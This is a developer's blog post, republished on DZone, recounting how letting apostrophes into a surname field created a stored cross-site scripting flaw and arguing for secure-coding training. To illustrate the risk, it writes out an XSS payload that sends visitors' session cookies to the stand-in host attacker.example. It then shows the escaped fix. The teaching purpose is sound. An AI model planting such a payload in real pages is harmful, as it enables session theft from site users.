
Confessions of an Insecure Coder


Hello, I'm a developer, and I once introduced a Cross-Site Scripting vulnerability into my code. But seriously, read on to see how this mistake turned this dev into a secure coding professional.


My name is Laurie Mercer, and I have introduced a security vulnerability into software.

The year was 2004. As I traveled to work, Franz Ferdinand and The Killers blared on my cool new iPod. I was a developer; it was my first proper job after graduating with a degree in computer science and moving to the big city. Responsible for implementing functional changes, I would code new forms and business logic in response to customer change requests. The project was in the "maintenance phase" - most of the development team had already moved on, and the changes were typically small.

One summer day, I received a request: a user had a last name that could not be entered into the system. The problem was that the name contained a single quote character: the user was an O'Brian. The only characters the system allowed were alphanumeric, so when the user hit the submit button, an error was displayed. I duly looked at the source code and spotted a simple change: allow non-alphanumeric characters, including the single quote character.

The change was simple, and we quickly came to testing. I loaded the system (in Internet Explorer 6, of course), entered "Mercer" in the surname field, and pressed submit. Milliseconds later, the test was confirmed as a success. I then entered the troublesome text, the name with the single quote. It submitted just fine, but when the form was displayed back to me, I only saw an "O." Where was Brian?

I checked the SQL server. O'Brian was the value stored in the database. I loaded the page again (wincing at the lack of "Brian"), and opened the source code viewer. O'Brian was there! It looked something like this:

<input id='id' type='text' name='surname' value='O'Brian' readonly>

Can you spot the error?

The apostrophe after the O closes the quote, and the browser assumes that the rest, Brian', is "behind the scenes" HTML or JavaScript - instructions for the web browser and not for human consumption.
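To make it concrete, here is a simplified sketch of how the browser reads that tag (real HTML parsers are more forgiving, but the effect is the same):

value='O'      the apostrophe from O'Brian closes the attribute, so the value is just "O"
Brian'         the leftover text becomes a stray, meaningless attribute and is never displayed
readonly>      the rest of the tag is parsed as normal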

I had accidentally introduced a persistent Cross-Site Scripting (XSS) vulnerability into the system!

The implications of this defect are serious. I could enter an <IMG> tag and display a picture of a cat. More seriously, it could be used to deface websites - the digital equivalent of graffiti. XSS can even be used to steal users' sessions, discover their IP addresses, and identify which web browsers they are using.
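For example, had an attacker submitted a surname like the one below (a hypothetical payload; attacker.example is a made-up domain), the unescaped value would have closed the attribute and the tag and quietly sent the session cookie of every visitor to the attacker:

'><script>new Image().src='https://attacker.example/steal?c='+document.cookie</script>

Because the value is stored in the database, it would then be echoed back to every user who viewed the record as:

<input id='id' type='text' name='surname' value=''><script>new Image().src='https://attacker.example/steal?c='+document.cookie</script>' readonly>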

Cross-Site Scripting (XSS) is so serious that it is included in the OWASP Top 10, a list of the ten most critical web application security risks. Everyone who develops web applications should be aware of this list. Everyone who develops modern software applications should be equipped to test for the vulnerabilities it describes, whether through code review, static analysis, or dynamic analysis.

How could this have happened? It's simple - I made a mistake. I was a naïve new graduate who had been taught how to code, but not taught about software security. I also had no access to static or dynamic analysis engines to check code for security flaws in the SDLC - we relied on fallible human code reviews performed by developers with no security domain expertise.
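The fix itself is tiny: encode user-supplied data before writing it into HTML, so that an apostrophe in a surname can no longer terminate an attribute. Assuming the page simply concatenated the stored value into the markup, the corrected output would have looked something like this:

<input id='id' type='text' name='surname' value='O&#39;Brian' readonly>

The browser still displays O'Brian, but it can no longer be tricked into treating part of a surname as markup or script.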

It seems incredible to me now that I was put on a software project as a developer with no security training and no access to any security tools. If our functional changes did not work as expected, there were serious penalties, yet there was no consideration of secure coding. Like Leibniz, the inventor of the binary number system, we assumed a "Best of All Possible Worlds." In fact, the only mention of security concerned securing access to the system: strong passwords, encrypting data in transit, and the vetting of staff who could access data. This age of innocence is certainly past. As any security consultant will tell you, over the past decades the neglect of application security has resulted in thousands of systems with super-secure password policies and SQL injection on their login pages.

Today it is uncontroversial to say that any software engineer working on any code, especially web and mobile development, should be trained in secure coding and should have access to tools that allow security flaws to be detected systematically throughout the SDLC. Yet at Veracode, we still see OWASP Top 10 flaws in the majority of applications we assess. Perhaps we need to shift left not only in the SDLC, but also in the way we train software engineers? I am sometimes asked what one thing I wish I had learned in computer science, something I felt was missing from the curriculum that could have helped me later. For me, the answer is simple: software security.



Published at DZone with permission of Laurie Mercer, DZone MVB. See the original article here.

Opinions expressed by DZone contributors are their own.
